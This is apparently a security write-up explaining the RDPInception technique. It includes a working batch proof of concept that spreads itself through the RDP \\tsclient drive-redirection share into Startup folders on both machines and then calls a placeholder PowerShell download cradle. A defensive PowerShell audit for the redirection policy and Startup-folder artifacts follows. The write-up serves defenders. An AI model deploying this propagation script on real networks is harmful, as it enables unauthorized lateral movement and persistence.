Remote Desktop is often used by systems administrators to manage machines remotely. In many organisations this means a machine is placed in a DMZ or segregated part of the network where the only inbound TCP port allowed into that segment is TCP 3389; any other channel into the segment, such as the drive redirection RDP provides, is easy to overlook.
The proof of concept for RDPInception is a relatively simple batch script, which we walk through below line by line:
Switches off echo.
@echo off
Puts a short timer to ensure that tsclient is mounted.
timeout 1 >nul 2>&1
Makes a temp directory on both the visiting machine and the target.
mkdir \\tsclient\c\temp >nul 2>&1
mkdir C:\temp >nul 2>&1
Copies this file into the directories.
copy run.bat C:\temp >nul 2>&1
copy run.bat \\tsclient\c\temp >nul 2>&1
Ensures the working text file does not already exist in %TEMP%.
del /q %TEMP%\temp_00.txt >nul 2>&1
Scans for startup directories on both the visiting machine and the target.
set dirs=dir /a:d /b /s C:\users\*Startup*
set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup*
echo|%dirs%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"
echo|%dirs2%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt"
Runs through each path and attempts to propagate the file to it.
for /F "tokens=*" %%a in (%TEMP%\temp_00.txt) DO (
copy run.bat "%%a" >nul 2>&1
copy C:\temp\run.bat "%%a" >nul 2>&1
copy \\tsclient\c\temp\run.bat "%%a" >nul 2>&1
)
Cleans up the %TEMP% file.
del /q %TEMP%\temp_00.txt >nul 2>&1
Execute the PowerShell download cradle.
powershell.exe <cradle here>
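The script above depends on two things a defender controls: the \\tsclient\c share that RDP drive redirection creates, and write access to the Startup folders it enumerates. The PowerShell audit below is an added example, not part of the RDPInception proof of concept; it reports whether the "Do not allow drive redirection" policy (the fDisableCdm registry value) is enforced on the host and lists recently written script files in every Startup folder. It assumes it runs elevated on a Windows host with the standard profile layout.

```powershell
# Added defensive audit (not from the RDPInception PoC). Assumes an elevated
# session on the host being checked and the standard Windows profile layout.

function Get-DriveRedirectionPolicy {
    # fDisableCdm = 1 corresponds to the "Do not allow drive redirection"
    # policy, which stops RDP from exposing \\tsclient\<drive> shares.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
    $value = (Get-ItemProperty -Path $key -Name fDisableCdm -ErrorAction SilentlyContinue).fDisableCdm
    if ($value -eq 1) { 'Disabled (policy enforced)' } else { 'Allowed (policy not set or 0)' }
}

function Get-RecentStartupScripts {
    param([int]$DaysBack = 7)
    $cutoff = (Get-Date).AddDays(-$DaysBack)
    # Per-user Startup folders plus the all-users folder: the same locations
    # the batch script's dir /s ... *Startup* scan resolves to.
    $folders = @(Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue |
        ForEach-Object { Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' })
    $folders += 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'
    foreach ($folder in $folders) {
        if (-not (Test-Path $folder)) { continue }
        Get-ChildItem $folder -File -ErrorAction SilentlyContinue |
            Where-Object { $_.Extension -in '.bat', '.cmd', '.ps1', '.vbs' -and $_.LastWriteTime -gt $cutoff } |
            Select-Object FullName, LastWriteTime, Length
    }
}

function Get-PoCArtifacts {
    # Staging paths named in the walkthrough above; presence is worth a closer look.
    @('C:\temp\run.bat', (Join-Path $env:TEMP 'temp_00.txt')) |
        Where-Object { Test-Path $_ } |
        ForEach-Object { Get-Item $_ | Select-Object FullName, LastWriteTime }
}

"Drive redirection on this host: $(Get-DriveRedirectionPolicy)"
"Script files written to Startup folders in the last 7 days:"
Get-RecentStartupScripts | Format-Table -AutoSize
"Known staging artifacts present:"
Get-PoCArtifacts | Format-Table -AutoSize
```

A non-empty Startup listing is not proof of compromise on its own; compare each entry against the host's known provisioning before acting on it.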